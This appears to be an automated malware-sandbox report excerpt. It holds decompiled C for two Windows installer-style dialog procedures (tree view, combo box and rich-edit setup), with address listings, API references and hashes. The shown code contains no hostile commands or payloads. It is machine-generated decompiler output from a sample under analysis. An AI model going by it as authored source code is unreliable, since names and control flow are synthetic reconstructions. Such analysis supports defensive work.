                                                        • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                        • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                        • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 96%
                                                        			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                        				struct HWND__* _v8;
                                                        				struct HWND__* _v12;
                                                        				long _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				intOrPtr _v28;
                                                        				signed char* _v32;
                                                        				int _v36;
                                                        				signed int _v44;
                                                        				int _v48;
                                                        				signed int* _v60;
                                                        				signed char* _v64;
                                                        				signed int _v68;
                                                        				long _v72;
                                                        				void* _v76;
                                                        				intOrPtr _v80;
                                                        				intOrPtr _v84;
                                                        				void* _v88;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t203;
                                                        				void* _t205;
                                                        				intOrPtr _t206;
                                                        				intOrPtr _t207;
                                                        				long _t212;
                                                        				signed int _t216;
                                                        				signed int _t227;
                                                        				void* _t230;
                                                        				void* _t231;
                                                        				int _t237;
                                                        				long _t242;
                                                        				long _t243;
                                                        				signed int _t244;
                                                        				signed int _t250;
                                                        				signed int _t252;
                                                        				signed char _t253;
                                                        				signed char _t259;
                                                        				void* _t264;
                                                        				void* _t266;
                                                        				signed char* _t284;
                                                        				signed char _t285;
                                                        				long _t287;
                                                        				long _t290;
                                                        				void* _t291;
                                                        				signed int _t300;
                                                        				signed int _t308;
                                                        				void* _t309;
                                                        				void* _t310;
                                                        				signed char* _t316;
                                                        				int _t320;
                                                        				int _t321;
                                                        				signed int* _t322;
                                                        				int _t323;
                                                        				long _t324;
                                                        				signed int _t325;
                                                        				long _t327;
                                                        				int _t328;
                                                        				signed int _t329;
                                                        				void* _t331;
                                                        
                                                        				_v12 = GetDlgItem(_a4, 0x3f9);
                                                        				_v8 = GetDlgItem(_a4, 0x408);
                                                        				_t331 = SendMessageA;
                                                        				_v24 =  *0x42f468;
                                                        				_v28 =  *0x42f434 + 0x94;
                                                        				_t320 = 0x10;
                                                        				if(_a8 != 0x110) {
                                                        					L23:
                                                        					if(_a8 != 0x405) {
                                                        						_t298 = _a16;
                                                        					} else {
                                                        						_a12 = 0;
                                                        						_t298 = 1;
                                                        						_a8 = 0x40f;
                                                        						_a16 = 1;
                                                        					}
                                                        					if(_a8 == 0x4e || _a8 == 0x413) {
                                                        						_v16 = _t298;
                                                        						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                        							if(( *0x42f43d & 0x00000002) != 0) {
                                                        								L41:
                                                        								if(_v16 != 0) {
                                                        									_t242 = _v16;
                                                        									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                        										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                        									}
                                                        									_t243 = _v16;
                                                        									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                        										_t298 = _v24;
                                                        										_t244 =  *(_t243 + 0x5c);
                                                        										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                        										} else {
                                                        											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                        										}
                                                        									}
                                                        								}
                                                        								goto L48;
                                                        							}
                                                        							if(_a8 == 0x413) {
                                                        								L33:
                                                        								_t298 = 0 | _a8 != 0x00000413;
                                                        								_t250 = E00404ACE(_v8, _a8 != 0x413);
                                                        								_t325 = _t250;
                                                        								if(_t325 >= 0) {
                                                        									_t99 = _v24 + 8; // 0x8
                                                        									_t298 = _t250 * 0x418 + _t99;
                                                        									_t252 =  *_t298;
                                                        									if((_t252 & 0x00000010) == 0) {
                                                        										if((_t252 & 0x00000040) == 0) {
                                                        											_t253 = _t252 ^ 0x00000001;
                                                        										} else {
                                                        											_t259 = _t252 ^ 0x00000080;
                                                        											if(_t259 >= 0) {
                                                        												_t253 = _t259 & 0x000000fe;
                                                        											} else {
                                                        												_t253 = _t259 | 0x00000001;
                                                        											}
                                                        										}
                                                        										 *_t298 = _t253;
                                                        										E0040117D(_t325);
                                                        										_a12 = _t325 + 1;
                                                        										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                        										_a8 = 0x40f;
                                                        									}
                                                        								}
                                                        								goto L41;
                                                        							}
                                                        							_t298 = _a16;
                                                        							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                        								goto L41;
                                                        							}
                                                        							goto L33;
                                                        						} else {
                                                        							goto L48;
                                                        						}
                                                        					} else {
                                                        						L48:
                                                        						if(_a8 != 0x111) {
                                                        							L56:
                                                        							if(_a8 == 0x200) {
                                                        								SendMessageA(_v8, 0x200, 0, 0);
                                                        							}
                                                        							if(_a8 == 0x40b) {
                                                        								_t230 =  *0x42a874; // 0x0
                                                        								if(_t230 != 0) {
                                                        									ImageList_Destroy(_t230);
                                                        								}
                                                        								_t231 =  *0x42a888; // 0x0
                                                        								if(_t231 != 0) {
                                                        									GlobalFree(_t231);
                                                        								}
                                                        								 *0x42a874 = 0;
                                                        								 *0x42a888 = 0;
                                                        								 *0x42f4a0 = 0;
                                                        							}
                                                        							if(_a8 != 0x40f) {
                                                        								L90:
                                                        								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                        									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                        									ShowWindow(_v8, _t321);
                                                        									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                        								}
                                                        								goto L93;
                                                        							} else {
                                                        								E004011EF(_t298, 0, 0);
                                                        								_t203 = _a12;
                                                        								if(_t203 != 0) {
                                                        									if(_t203 != 0xffffffff) {
                                                        										_t203 = _t203 - 1;
                                                        									}
                                                        									_push(_t203);
                                                        									_push(8);
                                                        									E00404B4E();
                                                        								}
                                                        								if(_a16 == 0) {
                                                        									L75:
                                                        									E004011EF(_t298, 0, 0);
                                                        									_t205 =  *0x42a888; // 0x0
                                                        									_v36 = _t205;
                                                        									_t206 =  *0x42f468;
                                                        									_v64 = 0xf030;
                                                        									_v24 = 0;
                                                        									if( *0x42f46c <= 0) {
                                                        										L86:
                                                        										if( *0x42f42c == 4) {
                                                        											InvalidateRect(_v8, 0, 1);
                                                        										}
                                                        										_t207 =  *0x42ebfc; // 0x68bf12
                                                        										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                        											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                                                        										}
                                                        										goto L90;
                                                        									}
                                                        									_t322 = _t206 + 8;
                                                        									do {
                                                        										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                        										if(_t212 != 0) {
                                                        											_t300 =  *_t322;
                                                        											_v72 = _t212;
                                                        											_v76 = 8;
                                                        											if((_t300 & 0x00000001) != 0) {
                                                        												_v76 = 9;
                                                        												_v60 =  &(_t322[4]);
                                                        												_t322[0] = _t322[0] & 0x000000fe;
                                                        											}
                                                        											if((_t300 & 0x00000040) == 0) {
                                                        												_t216 = (_t300 & 0x00000001) + 1;
                                                        												if((_t300 & 0x00000010) != 0) {
                                                        													_t216 = _t216 + 3;
                                                        												}
                                                        											} else {
                                                        												_t216 = 3;
                                                        											}
                                                        											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                        											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                        											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                        										}
                                                        										_v24 = _v24 + 1;
                                                        										_t322 =  &(_t322[0x106]);
                                                        									} while (_v24 <  *0x42f46c);
                                                        									goto L86;
                                                        								} else {
                                                        									_t323 = E004012E2( *0x42a888);
                                                        									E00401299(_t323);
                                                        									_t227 = 0;
                                                        									_t298 = 0;
                                                        									if(_t323 <= 0) {
                                                        										L74:
                                                        										SendMessageA(_v12, 0x14e, _t298, 0);
                                                        										_a16 = _t323;
                                                        										_a8 = 0x420;
                                                        										goto L75;
                                                        									} else {
                                                        										goto L71;
                                                        									}
                                                        									do {
                                                        										L71:
                                                        										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                        											_t298 = _t298 + 1;
                                                        										}
                                                        										_t227 = _t227 + 1;
                                                        									} while (_t227 < _t323);
                                                        									goto L74;
                                                        								}
                                                        							}
                                                        						}
                                                        						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                        							goto L93;
                                                        						} else {
                                                        							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                        							if(_t237 == 0xffffffff) {
                                                        								goto L93;
                                                        							}
                                                        							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                        							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                        								_t324 = 0x20;
                                                        							}
                                                        							E00401299(_t324);
                                                        							SendMessageA(_a4, 0x420, 0, _t324);
                                                        							_a12 = _a12 | 0xffffffff;
                                                        							_a16 = 0;
                                                        							_a8 = 0x40f;
                                                        							goto L56;
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_v36 = 0;
                                                        					 *0x42f4a0 = _a4;
                                                        					_v20 = 2;
                                                        					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                        					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                        					 *0x42a87c =  *0x42a87c | 0xffffffff;
                                                        					_v16 = _t264;
                                                        					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                                                        					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                        					 *0x42a874 = _t266;
                                                        					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                        					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                        						SendMessageA(_v8, 0x111b, _t320, 0);
                                                        					}
                                                        					DeleteObject(_v16);
                                                        					_t327 = 0;
                                                        					do {
                                                        						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                        						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                        							if(_t327 != 0x20) {
                                                        								_v20 = 0;
                                                        							}
                                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                                                        						}
                                                        						_t327 = _t327 + 1;
                                                        					} while (_t327 < 0x21);
                                                        					_t328 = _a16;
                                                        					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                        					_push(0x15);
                                                        					E0040417B(_a4);
                                                        					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                        					_push(0x16);
                                                        					E0040417B(_a4);
                                                        					_t329 = 0;
                                                        					_v16 = 0;
                                                        					if( *0x42f46c <= 0) {
                                                        						L19:
                                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                        						goto L20;
                                                        					} else {
                                                        						_t316 = _v24 + 8;
                                                        						_v32 = _t316;
                                                        						do {
                                                        							_t284 =  &(_t316[0x10]);
                                                        							if( *_t284 != 0) {
                                                        								_v64 = _t284;
                                                        								_t285 =  *_t316;
                                                        								_v88 = _v16;
                                                        								_t308 = 0x20;
                                                        								_v84 = 0xffff0002;
                                                        								_v80 = 0xd;
                                                        								_v68 = _t308;
                                                        								_v44 = _t329;
                                                        								_v72 = _t285 & _t308;
                                                        								if((_t285 & 0x00000002) == 0) {
                                                        									if((_t285 & 0x00000004) == 0) {
                                                        										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                        										_t309 =  *0x42a888; // 0x0
                                                        										 *(_t309 + _t329 * 4) = _t287;
                                                        									} else {
                                                        										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                        									}
                                                        								} else {
                                                        									_v80 = 0x4d;
                                                        									_v48 = 1;
                                                        									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                        									_t310 =  *0x42a888; // 0x0
                                                        									_v36 = 1;
                                                        									 *(_t310 + _t329 * 4) = _t290;
                                                        									_t291 =  *0x42a888; // 0x0
                                                        									_v16 =  *(_t291 + _t329 * 4);
                                                        								}
                                                        							}
                                                        							_t329 = _t329 + 1;
                                                        							_t316 =  &(_v32[0x418]);
                                                        							_v32 = _t316;
                                                        						} while (_t329 <  *0x42f46c);
                                                        						if(_v36 != 0) {
                                                        							L20:
                                                        							if(_v20 != 0) {
                                                        								E004041B0(_v8);
                                                        								goto L23;
                                                        							} else {
                                                        								ShowWindow(_v12, 5);
                                                        								E004041B0(_v12);
                                                        								L93:
                                                        								return E004041E2(_a8, _a12, _a16);
                                                        							}
                                                        						}
                                                        						goto L19;
                                                        					}
                                                        				}
                                                        			}































































                                                        0x00404b9e
                                                        0x00404ba6
                                                        0x00404bae
                                                        0x00404bb4
                                                        0x00404bcc
                                                        0x00404bcf
                                                        0x00404bd0
                                                        0x00404dfd
                                                        0x00404e04
                                                        0x00404e18
                                                        0x00404e06
                                                        0x00404e08
                                                        0x00404e0b
                                                        0x00404e0c
                                                        0x00404e13
                                                        0x00404e13
                                                        0x00404e24
                                                        0x00404e32
                                                        0x00404e35
                                                        0x00404e4b
                                                        0x00404ec0
                                                        0x00404ec3
                                                        0x00404ec5
                                                        0x00404ecf
                                                        0x00404edd
                                                        0x00404edd
                                                        0x00404edf
                                                        0x00404ee9
                                                        0x00404eef
                                                        0x00404ef2
                                                        0x00404ef5
                                                        0x00404f10
                                                        0x00404ef7
                                                        0x00404f01
                                                        0x00404f01
                                                        0x00404ef5
                                                        0x00404ee9
                                                        0x00000000
                                                        0x00404ec3
                                                        0x00404e50
                                                        0x00404e5b
                                                        0x00404e60
                                                        0x00404e67
                                                        0x00404e6c
                                                        0x00404e70
                                                        0x00404e7b
                                                        0x00404e7b
                                                        0x00404e7f
                                                        0x00404e83
                                                        0x00404e87
                                                        0x00404e9a
                                                        0x00404e89
                                                        0x00404e89
                                                        0x00404e90
                                                        0x00404e96
                                                        0x00404e92
                                                        0x00404e92
                                                        0x00404e92
                                                        0x00404e90
                                                        0x00404e9e
                                                        0x00404ea0
                                                        0x00404eb3
                                                        0x00404eb6
                                                        0x00404eb9
                                                        0x00404eb9
                                                        0x00404e83
                                                        0x00000000
                                                        0x00404e70
                                                        0x00404e52
                                                        0x00404e59
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404f13
                                                        0x00404f13
                                                        0x00404f1a
                                                        0x00404f8b
                                                        0x00404f93
                                                        0x00404f9b
                                                        0x00404f9b
                                                        0x00404fa4
                                                        0x00404fa6
                                                        0x00404fad
                                                        0x00404fb0
                                                        0x00404fb0
                                                        0x00404fb6
                                                        0x00404fbd
                                                        0x00404fc0
                                                        0x00404fc0
                                                        0x00404fc6
                                                        0x00404fcc
                                                        0x00404fd2
                                                        0x00404fd2
                                                        0x00404fdf
                                                        0x0040513f
                                                        0x00405146
                                                        0x00405163
                                                        0x00405169
                                                        0x0040517b
                                                        0x0040517b
                                                        0x00000000
                                                        0x00404fe5
                                                        0x00404fe7
                                                        0x00404fec
                                                        0x00404ff1
                                                        0x00404ff6
                                                        0x00404ff8
                                                        0x00404ff8
                                                        0x00404ff9
                                                        0x00404ffa
                                                        0x00404ffc
                                                        0x00404ffc
                                                        0x00405004
                                                        0x00405045
                                                        0x00405047
                                                        0x0040504c
                                                        0x00405057
                                                        0x0040505a
                                                        0x0040505f
                                                        0x00405066
                                                        0x00405069
                                                        0x0040510b
                                                        0x00405113
                                                        0x0040511b
                                                        0x0040511b
                                                        0x00405121
                                                        0x00405129
                                                        0x0040513a
                                                        0x0040513a
                                                        0x00000000
                                                        0x00405129
                                                        0x0040506f
                                                        0x00405072
                                                        0x00405078
                                                        0x0040507d
                                                        0x0040507f
                                                        0x00405081
                                                        0x00405087
                                                        0x0040508e
                                                        0x00405093
                                                        0x0040509a
                                                        0x0040509d
                                                        0x0040509d
                                                        0x004050a4
                                                        0x004050b0
                                                        0x004050b4
                                                        0x004050b6
                                                        0x004050b6
                                                        0x004050a6
                                                        0x004050a8
                                                        0x004050a8
                                                        0x004050d6
                                                        0x004050e2
                                                        0x004050f1
                                                        0x004050f1
                                                        0x004050f3
                                                        0x004050f6
                                                        0x004050ff
                                                        0x00000000
                                                        0x00405006
                                                        0x00405011
                                                        0x00405014
                                                        0x00405019
                                                        0x0040501b
                                                        0x0040501f
                                                        0x0040502f
                                                        0x00405039
                                                        0x0040503b
                                                        0x0040503e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405021
                                                        0x00405021
                                                        0x00405027
                                                        0x00405029
                                                        0x00405029
                                                        0x0040502a
                                                        0x0040502b
                                                        0x00000000
                                                        0x00405021
                                                        0x00405004
                                                        0x00404fdf
                                                        0x00404f22
                                                        0x00000000
                                                        0x00404f38
                                                        0x00404f42
                                                        0x00404f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00404f59
                                                        0x00404f5e
                                                        0x00404f6a
                                                        0x00404f6a
                                                        0x00404f6c
                                                        0x00404f7b
                                                        0x00404f7d
                                                        0x00404f81
                                                        0x00404f84
                                                        0x00000000
                                                        0x00404f84
                                                        0x00404f22
                                                        0x00404bd6
                                                        0x00404bd9
                                                        0x00404bdc
                                                        0x00404bec
                                                        0x00404bff
                                                        0x00404c0a
                                                        0x00404c10
                                                        0x00404c1e
                                                        0x00404c31
                                                        0x00404c36
                                                        0x00404c41
                                                        0x00404c4a
                                                        0x00404c60
                                                        0x00404c70
                                                        0x00404c7c
                                                        0x00404c7c
                                                        0x00404c81
                                                        0x00404c87
                                                        0x00404c89
                                                        0x00404c8c
                                                        0x00404c91
                                                        0x00404c96
                                                        0x00404c98
                                                        0x00404c98
                                                        0x00404cb8
                                                        0x00404cb8
                                                        0x00404cba
                                                        0x00404cbb
                                                        0x00404cc0
                                                        0x00404cc6
                                                        0x00404cca
                                                        0x00404ccf
                                                        0x00404cd7
                                                        0x00404cdb
                                                        0x00404ce0
                                                        0x00404ce5
                                                        0x00404ced
                                                        0x00404cf0
                                                        0x00404dbf
                                                        0x00404dd2
                                                        0x00000000
                                                        0x00404cf6
                                                        0x00404cf9
                                                        0x00404cfc
                                                        0x00404cff
                                                        0x00404cff
                                                        0x00404d04
                                                        0x00404d0d
                                                        0x00404d10
                                                        0x00404d14
                                                        0x00404d17
                                                        0x00404d1a
                                                        0x00404d23
                                                        0x00404d2c
                                                        0x00404d2f
                                                        0x00404d32
                                                        0x00404d35
                                                        0x00404d73
                                                        0x00404d96
                                                        0x00404d98
                                                        0x00404d9e
                                                        0x00404d75
                                                        0x00404d84
                                                        0x00404d84
                                                        0x00404d37
                                                        0x00404d3a
                                                        0x00404d48
                                                        0x00404d52
                                                        0x00404d54
                                                        0x00404d5a
                                                        0x00404d61
                                                        0x00404d64
                                                        0x00404d6c
                                                        0x00404d6c
                                                        0x00404d35
                                                        0x00404da4
                                                        0x00404da5
                                                        0x00404db1
                                                        0x00404db1
                                                        0x00404dbd
                                                        0x00404dd8
                                                        0x00404ddb
                                                        0x00404df8
                                                        0x00000000
                                                        0x00404ddd
                                                        0x00404de2
                                                        0x00404deb
                                                        0x0040517d
                                                        0x0040518f
                                                        0x0040518f
                                                        0x00404ddb
                                                        0x00000000
                                                        0x00404dbd
                                                        0x00404cf0

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 00404B97
                                                        • GetDlgItem.USER32 ref: 00404BA4
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                        • LoadImageA.USER32 ref: 00404C0A
                                                        • SetWindowLongA.USER32 ref: 00404C24
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                        • DeleteObject.GDI32(00000110), ref: 00404C81
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                          • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                        • GetWindowLongA.USER32 ref: 00404DC4
                                                        • SetWindowLongA.USER32 ref: 00404DD2
                                                        • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404FB0
                                                        • GlobalFree.KERNEL32 ref: 00404FC0
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                        • ShowWindow.USER32(?,00000000), ref: 00405169
                                                        • GetDlgItem.USER32 ref: 00405174
                                                        • ShowWindow.USER32(00000000), ref: 0040517B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                        • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                        • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                        • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                        				intOrPtr _v8;
                                                        				signed int _v12;
                                                        				void* _v16;
                                                        				struct HWND__* _t52;
                                                        				long _t86;
                                                        				int _t98;
                                                        				struct HWND__* _t99;
                                                        				signed int _t100;
                                                        				intOrPtr _t103;
                                                        				signed int _t106;
                                                        				intOrPtr _t107;
                                                        				intOrPtr _t109;
                                                        				int _t110;
                                                        				signed int* _t112;
                                                        				signed int _t113;
                                                        				char* _t114;
                                                        				CHAR* _t115;
                                                        
                                                        				if(_a8 != 0x110) {
                                                        					__eflags = _a8 - 0x111;
                                                        					if(_a8 != 0x111) {
                                                        						L11:
                                                        						__eflags = _a8 - 0x4e;
                                                        						if(_a8 != 0x4e) {
                                                        							__eflags = _a8 - 0x40b;
                                                        							if(_a8 == 0x40b) {
                                                        								 *0x42985c =  *0x42985c + 1;
                                                        								__eflags =  *0x42985c;
                                                        							}
                                                        							L25:
                                                        							_t110 = _a16;
                                                        							L26:
                                                        							return E004041E2(_a8, _a12, _t110);
                                                        						}
                                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                                        						_t110 = _a16;
                                                        						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                        							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                        							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                        								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                        								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                        								_v12 = _t100;
                                                        								__eflags = _t100 - _t109 - 0x800;
                                                        								_v16 = _t109;
                                                        								_v8 = 0x42e3c0;
                                                        								if(_t100 - _t109 < 0x800) {
                                                        									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                        									SetCursor(LoadCursorA(0, 0x7f02));
                                                        									_push(1);
                                                        									E0040458A(_a4, _v8);
                                                        									SetCursor(LoadCursorA(0, 0x7f00));
                                                        									_t110 = _a16;
                                                        								}
                                                        							}
                                                        						}
                                                        						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                        							goto L26;
                                                        						} else {
                                                        							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                        							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                        								goto L26;
                                                        							}
                                                        							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                        								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                        							}
                                                        							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                        								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                        							}
                                                        							return 1;
                                                        						}
                                                        					}
                                                        					__eflags = _a12 >> 0x10;
                                                        					if(_a12 >> 0x10 != 0) {
                                                        						goto L25;
                                                        					}
                                                        					__eflags =  *0x42985c; // 0x0
                                                        					if(__eflags != 0) {
                                                        						goto L25;
                                                        					}
                                                        					_t103 =  *0x42a068; // 0x68b54c
                                                        					_t25 = _t103 + 0x14; // 0x68b560
                                                        					_t112 = _t25;
                                                        					__eflags =  *_t112 & 0x00000020;
                                                        					if(( *_t112 & 0x00000020) == 0) {
                                                        						goto L25;
                                                        					}
                                                        					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                        					__eflags = _t106;
                                                        					 *_t112 = _t106;
                                                        					E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                        					E00404566();
                                                        					goto L11;
                                                        				} else {
                                                        					_t98 = _a16;
                                                        					_t113 =  *(_t98 + 0x30);
                                                        					if(_t113 < 0) {
                                                        						_t107 =  *0x42ebfc; // 0x68bf12
                                                        						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                        					}
                                                        					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                        					_t114 = _t113 +  *0x42f478;
                                                        					_push(0x22);
                                                        					_a16 =  *_t114;
                                                        					_v12 = _v12 & 0x00000000;
                                                        					_t115 = _t114 + 1;
                                                        					_v16 = _t115;
                                                        					_v8 = E004042B1;
                                                        					E0040417B(_a4);
                                                        					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                        					_push(0x23);
                                                        					E0040417B(_a4);
                                                        					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                        					E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                        					_t99 = GetDlgItem(_a4, 0x3e8);
                                                        					E004041B0(_t99);
                                                        					SendMessageA(_t99, 0x45b, 1, 0);
                                                        					_t86 =  *( *0x42f434 + 0x68);
                                                        					if(_t86 < 0) {
                                                        						_t86 = GetSysColor( ~_t86);
                                                        					}
                                                        					SendMessageA(_t99, 0x443, 0, _t86);
                                                        					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                        					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                        					 *0x42985c = 0;
                                                        					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                        					 *0x42985c = 0;
                                                        					return 0;
                                                        				}
                                                        			}




















                                                        0x004042f6
                                                        0x00404408
                                                        0x0040441b
                                                        0x00404477
                                                        0x00404477
                                                        0x0040447b
                                                        0x00404541
                                                        0x00404548
